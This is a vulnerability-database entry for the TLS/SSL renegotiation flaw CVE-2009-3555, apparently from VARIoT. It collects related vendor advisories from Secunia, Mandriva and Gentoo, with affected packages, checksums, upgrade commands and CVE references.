Vulnerability from variot - Updated: 2026-03-09 22:17The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue. A vulnerability exists in SSL and TLS protocols that may allow attackers to execute an arbitrary HTTP transaction. Multiple vendors' TLS protocol implementations are prone to a security vulnerability related to the session-renegotiation process. Successful exploits of this issue may allow attackers to perform limited man-in-the-middle attacks against vulnerable applications. Note that this issue does not allow attackers to decrypt encrypted data. The Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols are commonly used to provide authentication, encryption, integrity, and non-repudiation services to network applications such as HTTP, IMAP, POP3, LDAP. This could result in a situation where the attacker may be able to issue commands to the server that appear to be coming from a legitimate source. According to the Network Working Group:The server treats the client's initial TLS handshake as a renegotiation and thus believes that the initial data transmitted by the attacker is from the same entity as the subsequent client data.This issue affects SSL version 3.0 and newer and TLS version 1.0 and newer.
The gnutls_x509_crt_get_serial function in the GnuTLS library before 1.2.1, when running on big-endian, 64-bit platforms, calls the asn1_read_value with a pointer to the wrong data type and the wrong length value, which allows remote attackers to bypass the certificate revocation list (CRL) check and cause a stack-based buffer overflow via a crafted X.509 certificate, related to extraction of a serial number (CVE-2010-0731).
The updated packages have been patched to correct these issues. - The SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" also known as "Poodle", which could be exploited remotely resulting in disclosure of information. ----------------------------------------------------------------------
http://secunia.com/research/
http://secunia.com/company/jobs/open_positions/reverse_engineer
TITLE: Oracle Application Server Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA44293
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/44293/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=44293
RELEASE DATE: 2011-04-24
DISCUSS ADVISORY: http://secunia.com/advisories/44293/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/44293/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=44293
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Multiple vulnerabilities have been reported in Oracle Application Server, which can be exploited by malicious users and people to manipulate certain data.
1) An error exists in the C Oracle SSL API of the Oracle Security Service component and can be exploited to manipulate certain data.
For more information see vulnerability #1: SA37291
2) An unspecified error in the Oracle HTTP Server component can be exploited to manipulate certain data.
3) An error exists in the Midtier Infrastructure of the Portal component and can be exploited to manipulate certain data.
For more information see vulnerability #3: SA44246
4) An unspecified error in the Single Sign On component can be exploited by authenticated users to manipulate certain data.
The vulnerabilities are reported in the following products: * Oracle Application Server 10g Release 2 version 10.1.2.3.0. * Oracle Application Server 10g Release 3 version 10.1.3.5.0.
SOLUTION: Apply updates (please see the vendor's advisory for details).
PROVIDED AND/OR DISCOVERED BY: It is currently unclear who reported these vulnerabilities as the Oracle Critical Patch Update for April 2011 only provides a bundled list of credits. This section will be updated when/if the original reporter provides more information.
ORIGINAL ADVISORY: Oracle: http://www.oracle.com/technetwork/topics/security/cpuapr2011-301950.html#AppendixAS
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Mandriva Linux Security Advisory MDVSA-2010:084 http://www.mandriva.com/security/
Package : java-1.6.0-openjdk Date : April 28, 2010 Affected: 2009.0, 2009.1, 2010.0, Enterprise Server 5.0
Problem Description:
Multiple Java OpenJDK security vulnerabilities has been identified and fixed:
- TLS: MITM attacks via session renegotiation (CVE-2009-3555).
- Loader-constraint table allows arrays instead of only the b ase-classes (CVE-2010-0082).
- Policy/PolicyFile leak dynamic ProtectionDomains. (CVE-2010-0084).
- File TOCTOU deserialization vulnerability (CVE-2010-0085).
- Inflater/Deflater clone issues (CVE-2010-0088).
- Unsigned applet can retrieve the dragged information before drop action occurs (CVE-2010-0091).
- AtomicReferenceArray causes SIGSEGV -> SEGV_MAPERR error (CVE-2010-0092).
- System.arraycopy unable to reference elements beyond Integer.MAX_VALUE bytes (CVE-2010-0093).
- Deserialization of RMIConnectionImpl objects should enforce stricter checks (CVE-2010-0094).
- Subclasses of InetAddress may incorrectly interpret network addresses (CVE-2010-0095).
- JAR unpack200 must verify input parameters (CVE-2010-0837).
- CMM readMabCurveData Buffer Overflow Vulnerability (CVE-2010-0838).
- Applet Trusted Methods Chaining Privilege Escalation Vulner ability (CVE-2010-0840).
- No ClassCastException for HashAttributeSet constructors if run with -Xcomp (CVE-2010-0845)
- ImagingLib arbitrary code execution vulnerability (CVE-2010-0847).
- AWT Library Invalid Index Vulnerability (CVE-2010-0848).
Additional security issues that was fixed with IcedTea6 1.6.2: - deprecate MD2 in SSL cert validation (CVE-2009-2409). - ICC_Profile file existence detection information leak (CVE-2009-3728). - JRE AWT setDifflCM stack overflow (CVE-2009-3869). - JRE AWT setBytePixels heap overflow (CVE-2009-3871). - JPEG Image Writer quantization problem (CVE-2009-3873). - ImageI/O JPEG heap overflow (CVE-2009-3874). - MessageDigest.isEqual introduces timing attack vulnerabilities (CVE-2009-3875). - OpenJDK ASN.1/DER input stream parser denial of service (CVE-2009-3876, CVE-2009-3877) - GraphicsConfiguration information leak (CVE-2009-3879). - UI logging information leakage (CVE-2009-3880). - resurrected classloaders can still have children (CVE-2009-3881). - Numerous static security flaws in Swing (findbugs) (CVE-2009-3882). - Mutable statics in Windows PL&F (findbugs) (CVE-2009-3883). - zoneinfo file existence information leak (CVE-2009-3884). - BMP parsing DoS with UNC ICC links (CVE-2009-3885).
Additionally Paulo Cesar Pereira de Andrade (pcpa) at Mandriva found and fixed a bug in IcedTea6 1.8 that is also applied to the provided packages:
- plugin/icedteanp/IcedTeaNPPlugin.cc (plugin_filter_environment): Increment malloc size by one to account for NULL terminator. Bug# 474.
Packages for 2009.0 are provided due to the Extended Maintenance Program.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2409 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3728 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3869 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3871 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3873 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3874 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3875 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3876 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3877 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3879 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3880 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3881 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3882 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3883 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3884 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3885 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0082 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0084 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0085 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0088 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0091 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0092 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0093 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0094 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0095 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0837 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0838 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0840 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0845 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0847 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0848 http://article.gmane.org/gmane.comp.java.openjdk.distro-packaging.devel/8938 http://blogs.sun.com/darcy/resource/OpenJDK_6/openjdk6-b18-changes-summary.html http://icedtea.classpath.org/hg/release/icedtea6-1.8/rev/a6a02193b073
Updated Packages:
Mandriva Linux 2009.0: 37c14ebea4b3ceccbecba4ffea2630a6 2009.0/i586/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdv2009.0.i586.rpm 3f7ba1d78aaf5f1ca56e86fcb48e7192 2009.0/i586/java-1.6.0-openjdk-demo-1.6.0.0-2.b18.2mdv2009.0.i586.rpm 12963efa8b4ea6691ba68f4e72e81e5d 2009.0/i586/java-1.6.0-openjdk-devel-1.6.0.0-2.b18.2mdv2009.0.i586.rpm 6387d4381c518c5658701c114c5fcb9d 2009.0/i586/java-1.6.0-openjdk-javadoc-1.6.0.0-2.b18.2mdv2009.0.i586.rpm f90d2a22c10b6eb30aedef13207d346c 2009.0/i586/java-1.6.0-openjdk-plugin-1.6.0.0-2.b18.2mdv2009.0.i586.rpm 01e62b54974a3d1b5232de0baa196e41 2009.0/i586/java-1.6.0-openjdk-src-1.6.0.0-2.b18.2mdv2009.0.i586.rpm 212262f34829af20e53fb2076fa78d25 2009.0/SRPMS/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdv2009.0.src.rpm
Mandriva Linux 2009.0/X86_64: 630941e679a033285ddf5cb3e4c1d092 2009.0/x86_64/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdv2009.0.x86_64.rpm 6330c6dda9cf7c59a90f529bceeee17b 2009.0/x86_64/java-1.6.0-openjdk-demo-1.6.0.0-2.b18.2mdv2009.0.x86_64.rpm c7d708c5f14d710a6bdcc352bb18a55a 2009.0/x86_64/java-1.6.0-openjdk-devel-1.6.0.0-2.b18.2mdv2009.0.x86_64.rpm edf4b1d8efeb157bb0f19b4c4cc55935 2009.0/x86_64/java-1.6.0-openjdk-javadoc-1.6.0.0-2.b18.2mdv2009.0.x86_64.rpm ac9f8227297249940b1845f3ad95165f 2009.0/x86_64/java-1.6.0-openjdk-plugin-1.6.0.0-2.b18.2mdv2009.0.x86_64.rpm d1ed0ce1155c85c423d0cbe47eadfa5b 2009.0/x86_64/java-1.6.0-openjdk-src-1.6.0.0-2.b18.2mdv2009.0.x86_64.rpm 212262f34829af20e53fb2076fa78d25 2009.0/SRPMS/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdv2009.0.src.rpm
Mandriva Linux 2009.1: 304bc2cab18b29781bfac69d4927ddce 2009.1/i586/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdv2009.1.i586.rpm 77f0d2e2b2c04288a5aae608a2f73f1a 2009.1/i586/java-1.6.0-openjdk-demo-1.6.0.0-2.b18.2mdv2009.1.i586.rpm 7ff7542b4328fd978725f8e0b02590d9 2009.1/i586/java-1.6.0-openjdk-devel-1.6.0.0-2.b18.2mdv2009.1.i586.rpm 3d1bf214209ea3aef86b58962e80901e 2009.1/i586/java-1.6.0-openjdk-javadoc-1.6.0.0-2.b18.2mdv2009.1.i586.rpm f52cf5f8d3f85b98da246963d583f6bc 2009.1/i586/java-1.6.0-openjdk-plugin-1.6.0.0-2.b18.2mdv2009.1.i586.rpm 87b2fd7ac9883e624e71faa993559e78 2009.1/i586/java-1.6.0-openjdk-src-1.6.0.0-2.b18.2mdv2009.1.i586.rpm 0ff2ca4dfc122a3538349ed2dab6ed81 2009.1/SRPMS/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdv2009.1.src.rpm
Mandriva Linux 2009.1/X86_64: 883105d4347bb0864c7c73e4f0865066 2009.1/x86_64/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdv2009.1.x86_64.rpm ac44d41806625e0be7a55ff30bf1f0e7 2009.1/x86_64/java-1.6.0-openjdk-demo-1.6.0.0-2.b18.2mdv2009.1.x86_64.rpm 67db7247fbf1b5be5391f33603b9148c 2009.1/x86_64/java-1.6.0-openjdk-devel-1.6.0.0-2.b18.2mdv2009.1.x86_64.rpm 0b6e7a93df49306976453daf29a29d96 2009.1/x86_64/java-1.6.0-openjdk-javadoc-1.6.0.0-2.b18.2mdv2009.1.x86_64.rpm 67e679d7aa4545a968889dcbb1a3fa8e 2009.1/x86_64/java-1.6.0-openjdk-plugin-1.6.0.0-2.b18.2mdv2009.1.x86_64.rpm 4042e3ae7e3b2dbdcba0e73aadd219d5 2009.1/x86_64/java-1.6.0-openjdk-src-1.6.0.0-2.b18.2mdv2009.1.x86_64.rpm 0ff2ca4dfc122a3538349ed2dab6ed81 2009.1/SRPMS/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdv2009.1.src.rpm
Mandriva Linux 2010.0: f3c1bb7b091d5889a856edf93e066367 2010.0/i586/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdv2010.0.i586.rpm 7f717091a34f98e9547c698bf08065f5 2010.0/i586/java-1.6.0-openjdk-demo-1.6.0.0-2.b18.2mdv2010.0.i586.rpm 21b8532c934559100b0dbc498ba3c52e 2010.0/i586/java-1.6.0-openjdk-devel-1.6.0.0-2.b18.2mdv2010.0.i586.rpm 8711fdef27cce9af73191903f85dbcd6 2010.0/i586/java-1.6.0-openjdk-javadoc-1.6.0.0-2.b18.2mdv2010.0.i586.rpm 1905269f878bb1c6367dedc6797f6914 2010.0/i586/java-1.6.0-openjdk-plugin-1.6.0.0-2.b18.2mdv2010.0.i586.rpm c5f53d24770de6704f00fdf34c87a703 2010.0/i586/java-1.6.0-openjdk-src-1.6.0.0-2.b18.2mdv2010.0.i586.rpm b789ff663963ae8b60a0d189b870907c 2010.0/SRPMS/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdv2010.0.src.rpm
Mandriva Linux 2010.0/X86_64: 100203d38e76348f262d69d2cae8a7ba 2010.0/x86_64/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdv2010.0.x86_64.rpm f155019a4a22d7bf7265c67024dcbc33 2010.0/x86_64/java-1.6.0-openjdk-demo-1.6.0.0-2.b18.2mdv2010.0.x86_64.rpm 8eaf304d6eb93212d1045adc301de385 2010.0/x86_64/java-1.6.0-openjdk-devel-1.6.0.0-2.b18.2mdv2010.0.x86_64.rpm 2e2082bd89db22cf5fa4be2ebaceb71c 2010.0/x86_64/java-1.6.0-openjdk-javadoc-1.6.0.0-2.b18.2mdv2010.0.x86_64.rpm 3e7a1849db88a8b8ddcdf30441edfcb7 2010.0/x86_64/java-1.6.0-openjdk-plugin-1.6.0.0-2.b18.2mdv2010.0.x86_64.rpm fbc9da5e2080972f6f8c01f23e86890f 2010.0/x86_64/java-1.6.0-openjdk-src-1.6.0.0-2.b18.2mdv2010.0.x86_64.rpm b789ff663963ae8b60a0d189b870907c 2010.0/SRPMS/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdv2010.0.src.rpm
Mandriva Enterprise Server 5: 742a7a6dcc82962a132eadb91a2b1736 mes5/i586/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdvmes5.1.i586.rpm 3acd32ccd1fee71f07ccb4b038434ffd mes5/i586/java-1.6.0-openjdk-demo-1.6.0.0-2.b18.2mdvmes5.1.i586.rpm c3358ac84dbc950752655fee46fd5e4b mes5/i586/java-1.6.0-openjdk-devel-1.6.0.0-2.b18.2mdvmes5.1.i586.rpm a30ef6b33fd9ba1403ab46ef9643efdb mes5/i586/java-1.6.0-openjdk-javadoc-1.6.0.0-2.b18.2mdvmes5.1.i586.rpm 534f95a18c4798ec80cdfe47bd1148a8 mes5/i586/java-1.6.0-openjdk-plugin-1.6.0.0-2.b18.2mdvmes5.1.i586.rpm e79e4bd9462096222f5b07d681b3d418 mes5/i586/java-1.6.0-openjdk-src-1.6.0.0-2.b18.2mdvmes5.1.i586.rpm 0bc580c8d4d6e57cbee939bf68743170 mes5/SRPMS/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdvmes5.1.src.rpm
Mandriva Enterprise Server 5/X86_64: 180566f92a5564c747c716ecdf082c8f mes5/x86_64/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdvmes5.1.x86_64.rpm 5e05d90fe32dfce7b15db7d9e5604227 mes5/x86_64/java-1.6.0-openjdk-demo-1.6.0.0-2.b18.2mdvmes5.1.x86_64.rpm 09506c689ed0265023861e006fbcb624 mes5/x86_64/java-1.6.0-openjdk-devel-1.6.0.0-2.b18.2mdvmes5.1.x86_64.rpm c9ff4a3a4695c56b13268d76c355cfbe mes5/x86_64/java-1.6.0-openjdk-javadoc-1.6.0.0-2.b18.2mdvmes5.1.x86_64.rpm 0a70a54c2eed68e723cbc65de63bfbff mes5/x86_64/java-1.6.0-openjdk-plugin-1.6.0.0-2.b18.2mdvmes5.1.x86_64.rpm 166c980a8479cd915f3507070c25508e mes5/x86_64/java-1.6.0-openjdk-src-1.6.0.0-2.b18.2mdvmes5.1.x86_64.rpm 0bc580c8d4d6e57cbee939bf68743170 mes5/SRPMS/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdvmes5.1.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFL1/vUmqjQ0CJFipgRAlcyAJ9+2v53cztdo8nXoixp0vg0IuQjrACbB/vW +oOtru3I2iYRjlx04fi7wMw= =rIwa -----END PGP SIGNATURE----- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201301-01
http://security.gentoo.org/
Severity: High Title: Mozilla Products: Multiple vulnerabilities Date: January 08, 2013 Bugs: #180159, #181361, #207261, #238535, #246602, #251322, #255221, #255234, #255687, #257577, #260062, #261386, #262704, #267234, #273918, #277752, #280226, #280234, #280393, #282549, #284439, #286721, #290892, #292034, #297532, #305689, #307045, #311021, #312361, #312645, #312651, #312675, #312679, #312763, #313003, #324735, #326341, #329279, #336396, #341821, #342847, #348316, #357057, #360055, #360315, #365323, #373595, #379549, #381245, #388045, #390771, #395431, #401701, #403183, #404437, #408161, #413657, #419917, #427224, #433383, #437780, #439586, #439960, #444318 ID: 201301-01
Synopsis
Multiple vulnerabilities have been found in Mozilla Firefox, Thunderbird, SeaMonkey, NSS, GNU IceCat, and XULRunner, some of which may allow execution of arbitrary code or local privilege escalation.
Background
Mozilla Firefox is an open-source web browser and Mozilla Thunderbird an open-source email client, both from the Mozilla Project. The SeaMonkey project is a community effort to deliver production-quality releases of code derived from the application formerly known as the 'Mozilla Application Suite'. XULRunner is a Mozilla runtime package that can be used to bootstrap XUL+XPCOM applications such as Firefox and Thunderbird. NSS is Mozilla's Network Security Services library that implements PKI support. IceCat is the GNU version of Firefox.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-client/firefox < 10.0.11 >= 10.0.11 2 www-client/firefox-bin < 10.0.11 >= 10.0.11 3 mail-client/thunderbird < 10.0.11 >= 10.0.11 4 mail-client/thunderbird-bin < 10.0.11 >= 10.0.11 5 www-client/seamonkey < 2.14-r1 >= 2.14-r1 6 www-client/seamonkey-bin < 2.14 >= 2.14 7 dev-libs/nss < 3.14 >= 3.14 8 www-client/mozilla-firefox <= 3.6.8 Vulnerable! 9 www-client/mozilla-firefox-bin <= 3.5.6 Vulnerable! 10 mail-client/mozilla-thunderbird <= 3.0.4-r1 Vulnerable! 11 mail-client/mozilla-thunderbird-bin <= 3.0 Vulnerable! 12 www-client/icecat <= 10.0-r1 Vulnerable! 13 net-libs/xulrunner <= 2.0-r1 Vulnerable! 14 net-libs/xulrunner-bin <= 1.8.1.19 Vulnerable! ------------------------------------------------------------------- NOTE: Certain packages are still vulnerable. Users should migrate to another package if one is available or wait for the existing packages to be marked stable by their architecture maintainers. ------------------------------------------------------------------- 14 affected packages
Description
Multiple vulnerabilities have been discovered in Mozilla Firefox, Thunderbird, SeaMonkey, NSS, GNU IceCat, and XULRunner. Please review the CVE identifiers referenced below for details.
Impact
A remote attacker could entice a user to view a specially crafted web page or email, possibly resulting in execution of arbitrary code or a Denial of Service condition. Furthermore, a remote attacker may be able to perform Man-in-the-Middle attacks, obtain sensitive information, bypass restrictions and protection mechanisms, force file downloads, conduct XML injection attacks, conduct XSS attacks, bypass the Same Origin Policy, spoof URL's for phishing attacks, trigger a vertical scroll, spoof the location bar, spoof an SSL indicator, modify the browser's font, conduct clickjacking attacks, or have other unspecified impact.
A local attacker could gain escalated privileges, obtain sensitive information, or replace an arbitrary downloaded file.
Workaround
There is no known workaround at this time.
Resolution
All Mozilla Firefox users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=www-client/firefox-10.0.11"
All users of the Mozilla Firefox binary package should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-10.0.11"=
All Mozilla Thunderbird users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=mail-client/thunderbird-10.0.11"
All users of the Mozilla Thunderbird binary package should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=mail-client/thunderbird-bin-10.0.11"
All Mozilla SeaMonkey users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=www-client/seamonkey-2.14-r1"
All users of the Mozilla SeaMonkey binary package should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=www-client/seamonkey-bin-2.14"
All NSS users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/nss-3.14"
The "www-client/mozilla-firefox" package has been merged into the "www-client/firefox" package. To upgrade, please unmerge "www-client/mozilla-firefox" and then emerge the latest "www-client/firefox" package:
# emerge --sync # emerge --unmerge "www-client/mozilla-firefox" # emerge --ask --oneshot --verbose ">=www-client/firefox-10.0.11"
The "www-client/mozilla-firefox-bin" package has been merged into the "www-client/firefox-bin" package. To upgrade, please unmerge "www-client/mozilla-firefox-bin" and then emerge the latest "www-client/firefox-bin" package:
# emerge --sync # emerge --unmerge "www-client/mozilla-firefox-bin" # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-10.0.11"=
The "mail-client/mozilla-thunderbird" package has been merged into the "mail-client/thunderbird" package. To upgrade, please unmerge "mail-client/mozilla-thunderbird" and then emerge the latest "mail-client/thunderbird" package:
# emerge --sync # emerge --unmerge "mail-client/mozilla-thunderbird" # emerge --ask --oneshot -v ">=mail-client/thunderbird-10.0.11"
The "mail-client/mozilla-thunderbird-bin" package has been merged into the "mail-client/thunderbird-bin" package. To upgrade, please unmerge "mail-client/mozilla-thunderbird-bin" and then emerge the latest "mail-client/thunderbird-bin" package:
# emerge --sync # emerge --unmerge "mail-client/mozilla-thunderbird-bin" # emerge --ask --oneshot -v ">=mail-client/thunderbird-bin-10.0.11"
Gentoo discontinued support for GNU IceCat. We recommend that users unmerge GNU IceCat:
# emerge --unmerge "www-client/icecat"
Gentoo discontinued support for XULRunner. We recommend that users unmerge XULRunner:
# emerge --unmerge "net-libs/xulrunner"
Gentoo discontinued support for the XULRunner binary package. We recommend that users unmerge XULRunner:
# emerge --unmerge "net-libs/xulrunner-bin"
References
[ 1 ] CVE-2011-3101 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3101 [ 2 ] CVE-2007-2436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2436 [ 3 ] CVE-2007-2437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2437 [ 4 ] CVE-2007-2671 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2671 [ 5 ] CVE-2007-3073 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3073 [ 6 ] CVE-2008-0016 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0016 [ 7 ] CVE-2008-0017 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0017 [ 8 ] CVE-2008-0367 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0367 [ 9 ] CVE-2008-3835 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3835 [ 10 ] CVE-2008-3836 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3836 [ 11 ] CVE-2008-3837 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3837 [ 12 ] CVE-2008-4058 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4058 [ 13 ] CVE-2008-4059 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4059 [ 14 ] CVE-2008-4060 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4060 [ 15 ] CVE-2008-4061 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4061 [ 16 ] CVE-2008-4062 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4062 [ 17 ] CVE-2008-4063 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4063 [ 18 ] CVE-2008-4064 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4064 [ 19 ] CVE-2008-4065 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4065 [ 20 ] CVE-2008-4066 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4066 [ 21 ] CVE-2008-4067 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4067 [ 22 ] CVE-2008-4068 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4068 [ 23 ] CVE-2008-4069 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4069 [ 24 ] CVE-2008-4070 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4070 [ 25 ] CVE-2008-4582 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4582 [ 26 ] CVE-2008-5012 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5012 [ 27 ] CVE-2008-5013 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5013 [ 28 ] CVE-2008-5014 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5014 [ 29 ] CVE-2008-5015 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5015 [ 30 ] CVE-2008-5016 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5016 [ 31 ] CVE-2008-5017 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5017 [ 32 ] CVE-2008-5018 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5018 [ 33 ] CVE-2008-5019 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5019 [ 34 ] CVE-2008-5021 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5021 [ 35 ] CVE-2008-5022 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5022 [ 36 ] CVE-2008-5023 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5023 [ 37 ] CVE-2008-5024 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5024 [ 38 ] CVE-2008-5052 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5052 [ 39 ] CVE-2008-5500 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5500 [ 40 ] CVE-2008-5501 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5501 [ 41 ] CVE-2008-5502 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5502 [ 42 ] CVE-2008-5503 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5503 [ 43 ] CVE-2008-5504 